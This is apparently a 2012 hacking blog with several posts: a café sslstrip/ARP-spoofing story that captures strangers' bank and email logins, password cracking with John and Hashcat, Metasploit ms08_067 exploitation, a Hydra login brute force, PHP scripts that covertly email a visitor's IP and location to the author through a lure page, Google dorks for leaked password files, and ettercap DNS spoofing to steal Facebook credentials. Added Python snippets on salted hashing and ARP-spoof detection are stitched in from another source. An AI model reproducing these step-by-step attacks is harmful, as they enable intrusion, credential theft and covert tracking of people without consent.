Wednesday, December 26, 2012

"And a happy new (F)ear!" ... SslStrip said!

Hello,
Merry Christmas everyone! Today, 26/12/12, I will tell you a story which Mr. F told me yesterday. Actually, it's a horror story, in which none of us would like to be the protagonist!

Sit comfortably and pay attention.

"Mr. F was on holidays (since 23/12/12) and he wanted to hang out for a coffee. He took his netbook's case, he put on his jeans and after an hour he was drinking a coffee at Syntagma square (Attiki - Syntagma, Athens). While he was listening to the well-known horrible music of the coffee shop, he decided to turn on his Asus netbook and perform a simple port scan with his favorite port scanner, Nmap. At first he didn't notice anything, but after a while a huge list of available hosts was displayed on his 10.1 inch screen. 'Wow', he said! 'It's my lucky day.' After that, a crazy idea crossed Mr. F's mind. He called John (his best friend) to ask him to send Sslstrip via Dropbox. I'm sure everyone knows what Mr. F will attempt to do. While he was waiting for Sslstrip, he continued drinking his coffee and relaxing. Then he pressed 'F5' on his Dropbox account, and he suddenly saw a new folder named 'Sslstrip 0.9' with a tar.gz file inside. He extracted it, checked that everything worked and started thinking.

He didn't type anything for 2 minutes. He was thinking: what must I do now? The final thought was to enable port forwarding with the following command: $ echo '1' > /proc/sys/net/ipv4/ip_forward. And that's what he entered. Then he checked that ip_forward was '1' instead of '0'. 'Everything is ok', he thought. After a while, he typed the 2nd command: $ iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080. 'With the above command I will redirect requests from port 80 to port 8080, and I will still be able to hand the connections on to their correct destination port.' After that, he was ready to type the 3rd command!

That was $ arpspoof -i wlan0 -t 192.168.1.7 192.168.1.1. With the above command he would be able to perform an ARP MITM attack between the Target (192.168.1.7) and the Host (192.168.1.1). - You can easily notice that he didn't use broadcast arpspoof. The reason is that he actually tried it, but the network was crashing! - 'Perfect!' he said, while he was watching the network traffic!

Read more: http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrac

'I am ready', he said. 'I am ready to proceed to the final step!' Can you guess the final step? He only had to make Sslstrip listen on port 8080. 'Very easy', he said. 'I only have to type: $ python sslstrip.py -l 8080 and then wait as long as I need.'
He entered the command, drank his water (he had already finished his coffee) and waited for the magic moment!
  

He made some calls, browsed Facebook, played some mobile games and after 20 minutes he decided to stop sslstrip and browse the .log file. The results were awesome. Banking, Facebook, eBay, Gmail and Hotmail accounts had been logged into the Sslstrip log file! He was able to access any account. He was ready to buy products, browse emails, transfer money and other things!
eBay account example


After he finished, he closed his netbook, paid the waiter and left the coffee shop singing 'I wish you a Merry Christmas, I wish you a Merry Christmas ... and a Happy New (F)ear!!!'

Are you still here? Do you still feel safe with https? Mr. F hopes so. ;)

Thanks,
Nikos Danopoulos

Sunday, December 23, 2012

Password Cracking : John The Ripper & Hashcat!


Hello everyone,

Today I'm gonna show you how to crack MD4, MD5, SHA1 and other hash types using John The Ripper and Hashcat.

John The Ripper: "John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version."

Source: http://www.openwall.com/john/ 

Hashcat: "Hashcat is the world’s fastest CPU-based password recovery tool.
While it's not as fast as its GPU counterparts oclHashcat-plus and oclHashcat-lite, large lists can be easily split in half with a good dictionary and a bit of knowledge of the command switches."

Source: http://hashcat.net/wiki/doku.php?id=hashcat

Download John The Ripper (Jumbo 1.7.9) and Hashcat (v0.41).

Install both John and Hashcat and we are ready to start.
It's time to launch them. Go to John's run folder (JohnTheRipper-unstable-jumbo/run/) and type $ ./john to launch John.

Requirements for cracking a password with John: a wordlist and the password hash.

Here is a site where you can convert a word into its MD5 hash.
In the following list you can find some great wordlists. (I suggest you use an English dictionary as your wordlist.)

ftp://ftp.cerias.purdue.edu/pub/dict/wordlists/
ftp://ftp.openwall.com/pub/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords

Now it's time to try cracking passwords with John. We will use these password hashes:

b326b5062b2f0e69046810717534cb09
d41134fbdb1aacda7ccdb49ed3d33948
37b4e2d82900d5e94b8da524fbeb33c0
4ed5d2eaed1a1fadcc41ad1d58ed603e
e09491aee3bd9ec02e805ffdac0beb12

Open your test.txt file and insert the above hashes. We also know that the passwords were hashed with MD5.
So we have a test.txt file with the hashes, and we know the hashes are in MD5 format!

1st CHALLENGE:

$./john --format=raw-md5 --single test.txt

--format=raw-md5 is the format/type of the hash (MD5 in this case)
--single is John's single-crack mode, which tries to crack passwords quickly without using our wordlist



RESULT:

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])


SCORE: Passwords 1 - 0 John

2nd CHALLENGE:

$./john --format=raw-md5 --wordlist=word_list_file.txt test.txt  

--wordlist=word_list_file.txt selects our wordlist (replace "word_list_file.txt" with your wordlist's file name)

RESULT: 

Loaded 5 password hashes with no different salts (Raw MD5 [128/128 SSE2 intrinsics 12x])
city             (4)
scary            (2)
observation      (5)
true             (1)
football         (3)

 



SCORE: Passwords 1 - 1 John the Ripper!

If you wish to see your cracked hashes you can type:
$./john --show --format=raw-md5 test.txt 

What about cracking some SHA-1 hashes? For SHA-1 I will use the following hashes:

52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b

3rd CHALLENGE:

$./john --format=raw-sha1 --wordlist=wordlist_file.txt test.txt

--format=raw-sha1 tells John that the hash type is SHA-1

Loaded 5 password hashes with no different salts (Raw SHA-1 [128/128 SSE2 4x])
auto             (?)
reincarnation    (?)
manual           (?)
respect          (?)
security         (?)




SCORE: Passwords 1 - 2 John The Ripper



Ok, now it's time to crack some passwords with Hashcat. We will use the same hashes as before.

b326b5062b2f0e69046810717534cb09
d41134fbdb1aacda7ccdb49ed3d33948
37b4e2d82900d5e94b8da524fbeb33c0
4ed5d2eaed1a1fadcc41ad1d58ed603e
e09491aee3bd9ec02e805ffdac0beb12

1st CHALLENGE:

$./hashcat-cli32.bin 'test.txt' 'wordlistfile.txt'

'test.txt' is the file which contains the hashes
'wordlistfile.txt' is the wordlist

RESULT:

Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary


All hashes have been recovered




SCORE: Passwords 0 - 1 Hashcat

2nd CHALLENGE:

$./hashcat-cli32.bin -m0 'test.txt' 'wordlistfile.txt' 

-m0 is the hash type. -m selects the hash mode we want to crack, and 0 means the hash type is MD5.

RESULT:


Added hashes from file test.txt: 5 (1 salts)

NOTE: press enter for status-screen

e09491aee3bd9ec02e805ffdac0beb12:observation
4ed5d2eaed1a1fadcc41ad1d58ed603e:city
b326b5062b2f0e69046810717534cb09:true
37b4e2d82900d5e94b8da524fbeb33c0:football
d41134fbdb1aacda7ccdb49ed3d33948:scary
All hashes have been recovered

 


SCORE: Passwords 0 - 2 Hashcat


3rd CHALLENGE:

In this challenge we will crack SHA-1 hashes. We will use the same hashes as before.


52c281dfd1301b71d268ecc736ee500502a2be87
14012cd1b375ede06f6334b34167397cb7be4265
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8
8eec7bc461808e0b8a28783d0bec1a3a22eb0821
b363713a938afcd3c74603827fab79e935b2b09b 

$./hashcat-cli32.bin -m100 'test.txt' 'wordlistfile.txt'

-m100 means that we want to crack SHA-1 hashes (100 = SHA-1).

RESULT:

14012cd1b375ede06f6334b34167397cb7be4265:respect
0d612c12d2ac33625bf3e0351b6f5e4f73829fa8:auto
8eec7bc461808e0b8a28783d0bec1a3a22eb0821:security
52c281dfd1301b71d268ecc736ee500502a2be87:reincarnation
All hashes have been recovered



 
SCORE: Passwords 0 - 3 Hashcat


Many people believe that Hashcat is faster and simpler. And that's true! After the above results, what's your opinion?
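Why both tools recover these five hashes in no time, and what a salted, iterated hash changes, as an added example (not from this post or from the John/Hashcat projects): the same wordlist lookup is run against the post's raw-MD5 hashes, then a password is stored as PBKDF2-HMAC-SHA256 with a random salt so the precomputed table no longer applies. The seven-word WORDLIST is constructed; only the five hashes come from the post.

```python
import hashlib
import hmac
import os

# The five raw-MD5 hashes quoted in the post, unchanged.
POST_MD5_HASHES = [
    "b326b5062b2f0e69046810717534cb09",
    "d41134fbdb1aacda7ccdb49ed3d33948",
    "37b4e2d82900d5e94b8da524fbeb33c0",
    "4ed5d2eaed1a1fadcc41ad1d58ed603e",
    "e09491aee3bd9ec02e805ffdac0beb12",
]

# Constructed stand-in for a dictionary file: words from the post's own
# cracking output mixed with filler, in the order a wordlist might list them.
WORDLIST = ["password", "true", "scary", "football", "city", "observation", "winter"]

PBKDF2_ITERATIONS = 200_000  # tune so one verification costs ~100 ms on your server


def build_lookup(words, algo="md5"):
    """Hash the wordlist once. Against UNSALTED hashes this table answers any
    number of leaked hashes in O(1) each, which is why raw MD5 / SHA-1
    storage falls the moment the wordlist is decent."""
    return {hashlib.new(algo, w.encode()).hexdigest(): w for w in words}


def recover_unsalted(hashes, words, algo="md5"):
    """What john --wordlist and hashcat do for raw hashes: a table lookup."""
    table = build_lookup(words, algo)
    return {h: table[h] for h in hashes if h in table}


def store_salted(password, iterations=PBKDF2_ITERATIONS, salt=None):
    """Defender side: per-user random salt + PBKDF2-HMAC-SHA256, stored as
    iterations$salt$digest so the parameters travel with the record."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def recover_salted(stored_hashes, words):
    """No shared table exists for salted, iterated hashes: every (record, word)
    pair costs a full PBKDF2 run. Returns the recoveries and the number of
    PBKDF2 evaluations spent, to make the cost difference concrete."""
    found, work = {}, 0
    for stored in stored_hashes:
        for w in words:
            work += 1
            if verify_salted(w, stored):
                found[stored] = w
                break
    return found, work


if __name__ == "__main__":
    print(recover_unsalted(POST_MD5_HASHES, WORDLIST))
    record = store_salted("football", iterations=20_000)
    print(recover_salted([record], WORDLIST))
```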


Thanks,
Nikos Danopoulos

Tuesday, December 4, 2012

Identify, scan & exploit a Windows system

Hello everyone,

The following tutorial is based on a realistic scenario and I'm gonna show you how to identify, scan and exploit a Windows XP host.
The victim is running Windows XP and the attacker Linux Mint 13 (Maya).

So, the first step is to identify the live hosts on the network. A live host is a host which responds to an ICMP echo request (ping). For further information about ICMP, just have a look here (http://en.wikipedia.org/wiki/Internet_Control_Message_Protocol).

Let's say that the network is 10.50.97.0/24. Now, to find the live hosts you have to launch nmap (http://nmap.org/) and scan the network by typing the following command:

$ sudo nmap -v 10.50.97.0/24

The output should be something like this:

The above command starts Nmap and performs a ping and port scan of the hosts from 10.50.97.0 to 10.50.97.255. If you want a ping scan only, replace -v with -sn.

   
After finding the live hosts we have to identify their operating systems. To do this just type:

$ sudo nmap -O [alive host's ip]

With the above command you ask for operating system detection (-O). My output looks like this:

  
After a quick check of the output we can simply learn the target's OS.

After identifying the host we have to scan it for open ports, services and vulnerabilities. You can check for open ports and services by typing:

$ sudo nmap -sV [target's ip]

The above command probes open ports to determine service information.
   
   
   
Now, after gathering useful information we are gonna perform a vulnerability scan to identify open ports, more info and common vulnerabilities which we are gonna try to exploit later.

To do this, we have to launch a vulnerability scan with the Nessus tool.

Wait a couple of minutes. After the vulnerability scan has completed, check the report.

OK! Here is the info we have:

1) Vulnerable host's IP
2) Target's operating system
3) Service information
4) Open ports, other information, vulnerabilities
 
The next step is to run the Metasploit Framework. With Metasploit we will exploit the vulnerabilities of the target.
So, after launching Metasploit we should select the exploit we need (check your Nessus report to find the exploit name). In this case I'm gonna use the "ms08_067" exploit. To do this, type at the Metasploit prompt:

"use exploit/windows/smb/ms08_067_netapi"

'use' is the command which tells Metasploit which exploit to use.

Now type "show options" to see your exploit's options. Fill in the empty fields, such as "RHOST", "RPORT" etc., like the following example:


After completing the above step it's time to run our exploit. To do this, just type "exploit" and wait for it to run.

The following picture is an example of my Metasploit session.

 
 

 
Once the meterpreter session is open you can easily take screenshots of the target machine by typing "screenshot", dump password hashes by typing "hashdump" and other cool things!

Have your coffee and enjoy your meterpreter session!

Thanks,
Nikos Danopoulos

Sunday, November 4, 2012

Dive into netdiscover tool

Hello, hello,

In this tutorial we are gonna talk about and introduce the Netdiscover tool.

What is netdiscover?!?

/* Netdiscover is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server when you are wardriving. It can be also used on hub/switched networks. Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending arp requests, it can also be used to inspect your network arp traffic, or find network addresses using auto scan mode, which will scan for common local networks. */ So, that's what the official site of the netdiscover tool says about this powerful tool. The developer is Jaime Peñalba. Netdiscover is available and you can download it here.


So, when you are connected to a local network and you just want to know the other hosts' IPs, MACs and other typical information, you can simply run netdiscover from your terminal/konsole in Linux. It's very good, isn't it?

It's time for the "theory" part.
You may have seen some unknown words before, such as "IP", "MAC" and "arp requests". Here is the explanation of those words:

/*1) IP (Internet Protocol): the protocol used for relaying packets across the internet. In the DoD model IP sits at the "Internet Layer" and transfers data from the host to the destination based on their addresses.*/

/*2) MAC (physical address / hardware address): a hexadecimal address used for delivering packets to a destination. When a host wants to send a packet to another host it has to know that host's MAC address; if it doesn't, it has to send an *3) ARP request. An ARP request asks for the MAC address of the host with a specific IP. The host with that IP then replies with its MAC address.*/

So let's dive into the netdiscover tool.

In the following scenario I use IP 192.168.1.67, so replace my IP with yours.

1) Type "$ netdiscover --help" into a terminal to see the available options. Just have a look, and we are gonna explain some of them.
2) To find other hosts you have to use your interface. My interface is wlan0; type "$ ifconfig" to check yours.
3) After finding your IP and your interface, type "$ netdiscover -i [interface goes here]". The -i option specifies the interface we are gonna use. By executing this command netdiscover will show you the IPs in use on your network between 192.168.0.0 and 192.168.255.255. But let's see what you do if you want to scan a specific range.

4) For that you have to use the "-r" option. This scans a given range instead of auto scanning. For example "$ netdiscover -i [interface goes here] -r 192.168.2.0/24" means that netdiscover will scan from 192.168.2.0 to 192.168.2.255. If you want to scan from 192.0.0.0 to 192.255.255.255 use /8 instead of /16 or /24.

5) If you have the IP ranges in a file you can simply use the "-l" option. It loads the IP ranges you have written in the file and then scans them.

6) If you only want to sniff instead of sending anything, use the "-p" option (passive mode). For example "$ netdiscover -i wlan0 -r 192.168.0.0/16 -p". This command will just sniff.

7) Another awesome option is "-F", which lets you customize the pcap filter expression. The default is arp. We talked about ARP before at /*3)*/.

8) With "-s" you can set the sleep time between each ARP packet.

9) You can set the number of times to send each ARP request with "-c". That's helpful when you have packet loss.

10) Don't have much time? Just use "-f". That enables fast mode scanning ;)

11) With "-P" you can print the results in a format suitable for parsing by another program.

So, as you can see, the netdiscover tool has many options. It's useful and fast! I suggest you install it ;)

Here are some snaps of the examples I used before...

Here we use "-f" for fast scanning... The results are the same, but they come faster ;)

Here you can see all the available commands and options of the netdiscover tool, by running "--help".
In this picture we are using "-r" for the specific range 192.168.0.0


Thank you,
Nikos Danopoulos

Monday, August 27, 2012

THC Hydra web form dictionary attack

Hello ,

In this tutorial I will show you how to use THC Hydra to perform a dictionary attack against a web form, for example a username/password form.

THC Hydra is a powerful program that you can find in the BackTrack OS. With Hydra you can perform a dictionary attack against HTTP forms, SMB, routers and more.

#Step 1) To start the attack you have to find a good wordlist. A wordlist is a txt/lst file with many complex words inside (a good wordlist contains numbers, symbols and letters). You can download a wordlist from the web or you can make your own (recommended). So download crunch (a wordlist creator) from here, install it, go to the installation folder (crunch-3.3) and run the following commands:

cd crunch-3.3/

and then run:

./crunch 1 5 0123456789 > /root/Desktop/wordlist.txt

Your screen should look like this now:

#Step 2) Once the wordlist is ready you have to run Hydra and execute the attack.
Open hydra (Backtrack > Privilege Escalation > Password Attacks > Online Attacks > hydra)

#Step 3) Now go to the login page of the target site > right click > View page source, to view the source code of the form.
You will see something like this (but of course different, not exactly like the following):

<form name="input" action="kwd.php" method="post">
Username:
<input type="text" name="user">
Password:
<input type="password" name="pass">
<input type="submit" value="Login">
</form>

Just write the action page, the method, the username field name and the password field name into a txt file to remember them.
Now, before we finish, we have to try a random username and password to get the error message (don't forget to write the error message in the txt file too), like this:
(In this case the error message for a wrong login is ACCESS DENIED.)


Now it's time to perform the attack. Once we know the username field name, the password field name, the action page and the method, we are ready!

Now go to the hydra window (have a look at step 2 again) and type the following command

hydra www.site.com  http-form-post "/directory:user=^USER^&pass=^PASS^:ERROR MESSAGE" -L /root/Desktop/wordlist.txt -P /root/Desktop/wordlist.txt -t 10 -w 30 -o /root/Desktop/attack.txt




You have to change "www.site.com" to the target's site, /directory to the login page path (e.g. index/Login.php), user to the site's username field name (Step 3), pass to the site's password field name (Step 3) and ERROR MESSAGE to the error message the target gives you, in this case "ACCESS DENIED" (or e.g. "Wrong username or Password").

Thank you!

Nikos Danopoulos

Wednesday, August 8, 2012

Finding IPs via Gmail and with your own PHP code!

Hello there:)

Today I will show you a tutorial about how to find an IP with Gmail and with your own PHP code. First of all, PHP is a scripting language and you can find more about it here. There are many tutorials on the web too.

So, let's start. First of all you have to log in to your Gmail account. If you don't have one just create one! (Very simple.)
The second step is to find the hobbies of the target to send a realistic message. We only have to google his/her name or read the 'About' section on Facebook.
Now you have to send an email to the target and just wait for her/his reply!

Your screen should look like this....

Now open the 'Down button' as you can see in the following picture,

and just press 'Show original'. Now you will see the following...

You can easily see the IP after 'Received: by....'
So you have found your target's IP! Congrats.

One more popular way to find an IP is to make a script (8 lines), upload it to your web host and then send the link to the target. Here is how you can do it.

First of all access your web host account (I use 000webhost, it is very good and free). Then make a file with the name news.php. Edit it and write the following code into the file:

<?php
$ip = $_SERVER['REMOTE_ADDR'];
$to = 'youremail';
$from = 'From: me@gmail.com';
$subject = 'Ip';
$message = $ip;
mail($to, $subject, $message, $from);
?>

Code explanation:
Line 1: opening PHP tag
Line 2: the $ip variable holds the IP of the visitor (target)
Line 3: $to is your email
Line 4: $from is the sender (me@gmail.com); mail() takes it as a "From:" header line
Line 5: $subject is the email's subject (Ip)
Line 6: $message is the email's body; in this case the IP
Line 7: sending the email...
Line 8: closing PHP tag

Then send the link to your target (www.domain.com/news.php). When he clicks it you will receive a message in your email account with his IP!
Your message!!

*If you are using a Hotmail account, you will receive the message in the junk folder.

So, you have learned 2 ways of finding IPs. Enjoy :)

Thank you,

Nikos Danopoulos

Monday, July 30, 2012

How can Google dorks help us perform web attacks

Welcome,
There are many times when a hacker is at home and ... trying to find something interesting to do.
Here is a simple tutorial about how we can exploit Google with some useful Google dorks. If you don't know what Google dorks are, just read the following lines.

With Google dorks you can find many vulnerabilities by searching on Google. You type some specific operators in the Google search bar and then you can find vulnerabilities in many sites, of many different kinds.

So have a look:

The following query searches the 'Index of' directory listing of a site for a 'phpinfo.php' file.

intitle:"Index of" phpinfo.php  

You will see something like this on your screen:

(check the screenshot)
We have found a 'phpinfo.php' file in the 'Index of' listing of a site...

You can also check the Apache version... It's information!

So it's time to try finding SQLi vulnerabilities (SQLi on Wikipedia).

There are some simple queries you can 'run' for finding SQLi vulnerabilities.

ext:sql intext:@gmail.com intext:25d55ad283aa400af464c76d713c07ad

With this query we are searching for .sql files (ext:sql), for @gmail.com in the page and finally for 25d55ad283aa400af464c76d713c07ad, which is the MD5 hash of 12345678.

Also you can search for 'ext:sql intext:"INSERT INTO" intext:@gmail.com intext:password'

which searches for INSERT INTO in a webpage, for a Gmail account and for a password. You can replace gmail with hotmail/live/windowslive/yahoo and more.



So the most common dorks are 'inurl', which searches for a keyword in the URL; 'intext', which searches for text/keywords in the whole webpage; 'intitle', which searches for a keyword in the webpage title; and 'filetype', which searches for a specific file type like .pdf, .exe and more. You can use them for many reasons. They are very useful too.


So the final example is about 'password file dorks'.

Here are some dorks:
allinurl: auth_user_file.txt   <=== searches for auth_user_file.txt
filetype: xls inurl: "password.xls"   <=== searches for a file 'password.xls'
intitle:index.of pwd.db   <=== searches for password databases
index.of passlist.txt   <=== searches for password lists

There are many more. Just make a combination of keywords and use them.

Thank you
Nikos Danopoulos

Sunday, April 22, 2012

PHP anonymous email sender and information gathering. Ohh yes!

Hello, good morning!
Today (Sun Apr 22) you will see a powerful PHP script and HTML code for making 2 pages. The first page is an anonymous email sender, so you can send any email anywhere in the world with any sender name!
The second page collects all the information about the email sender.

Ok, here is a few-lines story!
I give the email sender to a friend and tell him/her: "Hey, this is an anonymous email sender. You can send mails everywhere! And of course with no name or with a fake name! Just open it." Let's say that your friend opens the link and sends an email... Then you will receive an email with the victim's IP, location (city, region_name), operating system (e.g. Windows, Linux), web browser (e.g. Firefox, Opera, IE, Iceweasel, Google Chrome), the address your friend sent the email to, and more.

Ok, let's start now. First of all you have to have a web host (I suggest 000webhost (www.000webhost.com) or ripway (www.ripway.com)). They are both free. Now go to the Desktop and make a new document. Open it and write the following code into the file:

<html>
<head><title>Email Anonymous Sender</title></head>
<body style="background-color:black">
<form method="post" action="aaa.php">
<p style="font-style:italic;color:white">Victim's Email: <input type="text" name="email"></p>
<p style="font-style:italic;color:white">Subject: <input type="text" name="subject"></p>
<p style="font-style:italic;color:white">Message: <textarea name="message" rows="5" cols="55"></textarea></p>
<p style="font-style:italic;color:white">Your Email: <input type="text" name="myemail"></p>
<input type="submit" value="Submit"/>
<input type="reset" value="Erase All"/>
</form>
</body>
</html>

Ok, now click on "save" and save it as "email.php" (WARNING: the name of the page is very important! Don't rename the page).

Now let's make the second page.

Make a new document and type the following code into it:
<?php
// Visitor details taken from the request itself.
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'];
// Fields submitted by the form in email.php.
$to = $_POST["email"];
$subject = $_POST["subject"];
$message = $_POST["message"];
$from = $_POST["myemail"];
$head = "From: " . $from;
// First mail: the message the user asked to send.
mail($to, $subject, $message, $head);
// Second mail: the report about the sender, delivered to you.
$mss = "Ip:" . $ip;
$me = "example@gmail.com";
$host = "host info";
$json = json_decode(file_get_contents('http://freegeoip.net/json/' . $ip));
$region_name = !empty($json->region_name) ? $json->region_name : 'Unknown Region';
$city = !empty($json->city) ? $json->city : 'Unknown City';
mail($me, $host, $mss . "," . "Victim's info:" . $browser . " " . "Location:" . $region_name . ":" . $city);
?>

<html>
<body style="background-color:black">
<h1 style="color:green">Let the games begin;) </h1>
<img src="https://encrypted-tbn3.google.com/images?q=tbn:ANd9GcSShwOxeW3aKl4VnV4cVMFE45ndqORlURwyxXl8ejE7x_UGS5O7" alt="That's how you look now.." style="color:white"/>
</body>
</html>

 

You have to put your own email address in place of "example@gmail.com" (the line I highlighted).

Ok, now save this document as "aaa.php". So, now we are ready.

Go to your web host (I use 000webhost) and go to the file manager. Then select "public_html" and click on the "upload" button. Now you have to upload the files you made before. Just select them and click upload (if you are using 000webhost don't forget to click the "check" icon).






Ok, now open a new tab in your web browser and type "mysite.net.76.net/email.php" (be careful! Instead of mysite.net.76.net type in your own website!)




Now send an email for testing. Just type your email in the Victim's Email field and send an email.
Now go to your email and you will see something like this.
There is your information: the IP, the web browser, your location, your operating system and more! Now you are ready to send it to a friend and have some fun!

Thank you,
Nikos Danopoulos

Saturday, April 21, 2012

Tut04: Ettercap (Scanning, attacking)

Hey!
With the following tutorial you will learn many things about ettercap, for example how to run an ARP attack, how to scan for hosts and more.
Ok, let's start.
First of all you have to download ettercap. Just become root (su) and then install ettercap with the following command: apt-get install ettercap.
Before you start using ettercap you must learn what ettercap is!
Ettercap is a very powerful tool for MITM attacks (man-in-the-middle attacks, http://en.wikipedia.org/wiki/Man-in-the-middle_attack). With ettercap you can do many tricks, for example sniffing on your network, DNS spoofing and more.

Now you are ready to see how ettercap works!

First of all open your terminal. Type "su" and your password to become root.

Here is a simple ettercap command:

ettercap -T -M arp:remote -i wlan0 /192.168.1.1/ // -P remote_browser

Ok. Let's see what this command does.
First of all with "ettercap" we call ettercap to run. Then -T starts ettercap in text mode.
-M starts the MITM (man in the middle) attack and arp:remote is the kind of poisoning.
-i is the interface. Mine is eth1 but yours may be wlan0 (as in the example).
/192.168.1.1/ // attacks the IPs between 192.168.1.1 and 192.168.1.254.
Finally -P calls the plugin you want. In this case "remote_browser", a plugin which lets you see the visited sites.


Another example is with the famous dns_spoof plugin.
With dns_spoof you can redirect the victim to any website.

Step 1) In the terminal type "cd /usr/share/ettercap/" and then "nano etter.dns" to open ettercap's DNS file and edit it.


By scrolling down you will see the following lines:
microsoft.com      A    198.182.196.56
*.microsoft.com    A    198.182.196.56
www.microsoft.com  PTR  198.182.196.56


Let's say that you want to redirect the victim from Google to YouTube. Just ping YouTube by typing ping www.youtube.com in the terminal and then change etter.dns to:
google.*   A   173.194.67.91
www.google.*   A  173.194.67.91
www.google.com  PTR 173.194.67.91

Then press Ctrl+O to save the changes and Ctrl+X to exit.
Now type in the terminal ettercap -T -M arp:remote -i eth1 /192.168.1.1/ // -P dns_spoof and the victim will be redirected to YouTube.

Also you can type
facebook.*   A   your ip
www.facebook.*   A  your ip
www.facebook.com  PTR your ip

and if the victim connects to Facebook, you will learn his password and username :)
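
Both the arpspoof step in the sslstrip story at the top of the page and the -M arp:remote command here depend on hosts accepting ARP replies that rebind the gateway's IP to a new MAC. As an added example (not from these posts or from the ettercap project), here is the detection side: a small watcher fed constructed ARP-reply observations for the posts' network (gateway 192.168.1.1, victim 192.168.1.7; every MAC is made up) that flags the rebinding and the single MAC claiming both addresses.

```python
from collections import defaultdict

# Constructed ARP-reply observations (seconds, sender IP, sender MAC) as a
# monitoring host on the same segment would see them. The IPs follow the posts
# (gateway 192.168.1.1, victim 192.168.1.7); every MAC here is made up.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "00:11:22:aa:bb:01"),  # the real gateway
    (0.5, "192.168.1.7",  "00:11:22:aa:bb:07"),  # the real victim
    (1.0, "192.168.1.20", "00:11:22:aa:bb:14"),  # some other host
    (5.0, "192.168.1.1",  "DE:AD:BE:EF:00:01"),  # a third MAC now answers for the gateway
    (5.1, "192.168.1.7",  "de:ad:be:ef:00:01"),  # ... and for the victim (arp:remote poisons both)
    (7.0, "192.168.1.1",  "de:ad:be:ef:00:01"),  # re-sent to keep the caches poisoned
]

# Bindings you know to be right, e.g. the gateway (what `arp -s` would pin).
TRUSTED = {"192.168.1.1": "00:11:22:aa:bb:01"}


class ArpWatch:
    """Flags the two symptoms of ARP poisoning: an IP whose MAC changes, and one
    MAC answering for several IPs. A replaced NIC or a router with address
    aliases can trigger these legitimately, so treat alerts as leads."""

    def __init__(self, trusted=None):
        self.expected = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.ips_by_mac = defaultdict(set)
        self.alerts = []  # (time, kind, subject, expected, observed)

    def observe(self, t, ip, mac):
        mac = mac.lower()
        # The first sighting of an unpinned IP becomes its baseline. Neither a
        # pinned nor a baselined IP is ever overwritten, so repeated poisoning
        # keeps alerting instead of silently becoming the new normal.
        baseline = self.expected.setdefault(ip, mac)
        if mac != baseline:
            self.alerts.append((t, "ip-mac-change", ip, baseline, mac))
        if ip not in self.ips_by_mac[mac]:
            self.ips_by_mac[mac].add(ip)
            if len(self.ips_by_mac[mac]) > 1:
                self.alerts.append((t, "mac-claims-multiple-ips", mac, None,
                                    sorted(self.ips_by_mac[mac])))

    def run(self, replies):
        for t, ip, mac in replies:
            self.observe(t, ip, mac)
        return self.alerts


def summarize(alerts):
    """Alert counts per kind, the view a dashboard or a test wants."""
    counts = defaultdict(int)
    for a in alerts:
        counts[a[1]] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in ArpWatch(TRUSTED).run(ARP_REPLIES):
        print(alert)
```

In a live deployment the observations come from a capture filter on ARP replies (or from arpwatch-style tooling) and the TRUSTED table from your gateway and server inventory.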

Thursday, April 12, 2012

Tutorial03: Nmap in our days

What about playing with nmap? A powerful tool for scanning your network!
(http://nmap.org/)

Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
Nmap was named "Security Product of the Year" by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in eight movies, including The Matrix Reloaded, Die Hard 4, and The Bourne Ultimatum.
Nmap is ...
  • Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
  • Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
  • Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
